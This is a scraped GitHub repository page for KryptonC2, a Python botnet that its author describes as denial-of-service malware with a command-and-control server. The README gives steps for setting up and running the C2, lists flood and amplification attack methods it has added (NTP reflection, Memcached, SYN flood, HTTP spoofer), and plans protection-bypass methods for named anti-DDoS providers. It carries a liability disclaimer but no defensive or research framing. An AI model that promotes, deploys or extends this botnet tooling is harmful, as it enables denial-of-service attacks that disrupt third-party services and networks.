E5CC GitHub - CirqueiraDev/KryptonC2: Krypton C2 is a simple botnet source. Credits Source Code: NixWasHere · GitHub
[go: up one dir, main page]

Skip to content

CirqueiraDev/KryptonC2

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

134 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Krypton Botnet


KryptonC2 is a basic open source denial of service botnet system written in Python 3, consists of a connect and control server and a bot malware script.


Installation

  1. Install Git and Python 3 on your server.

  2. Clone the KryptonC2 Github repository to your server via Git: $ git clone https://github.com/CirqueiraDev/KryptonC2.

  3. Change the host address and C&C port in the configuration section in bot.py to your server address and C&C port.

  4. Install the requirements.txt

  5. Start the C2 server by executing the command: $ python main.py.

  6. Add accounts in logins.txt using the format: username:password:yyyy-mm-dd.

  7. Configure the port on the config.json { "cnc_host": "0.0.0.0", "reg_host": "0.0.0.0", "cnc_port": 5511, "reg_port": 5512 }.

  8. Connect to the server through PuTTY on a raw socket connection.

2023-12-04.21-40-51.mp4

📍 Compiling the malware and installing it on vulnerable devices won't be told as it's highly illegal to get remote access to devices without permission 779C . Use of this project for illegal activities is at own risk! I'm not responsible for any of your taken actions!



News

  1. New method (HTTP SPOOFER) L7 Method. 11/11/2023
  2. New method (NTP Reflection + Payload) L4 Method. 12/11/2023
  3. New method (Memcached + Custom Payload) L4 Method. 12/11/2023
  4. New method (POD) L3 Method. 13/11/2023
  5. New method (ICMP) L3 Method. 13/11/2023
  6. Updated Method (HTTP IO) L7 Method. 14/11/2023
  7. Added expiration date for accounts (AAAA-MM-DD). 26/11/2023
  8. Update commands and visual. 02/12/2023
  9. New method (SYN Flood) L4 method and (ACK Flood) Removed. 04/12/2023
  10. Update visual and fix bugs. 01/22/2024

Ideas

  1. Method: OVH | Bypass OVH
  2. Method: POST | POST Flood
  3. Method: STRESS | Send HTTP Packet With High Byte
  4. Method: OSTRESS | STRESS Without Proxy
  5. Method: BYPASS | Bypass Normal AntiDDoS
  6. Method: DGB | DDoS Guard Bypass
  7. Method: AVB | Arvan Cloud Bypass
  8. Send attacks with API's
  9. Optimize malicious code

Owner Code

📌Source: https://github.com/NixWasHere/NixC2

KryptonC2 by:

  • Discord: cirqueira

Instagram

Releases

No releases published

Packages

 
 
 

Languages

0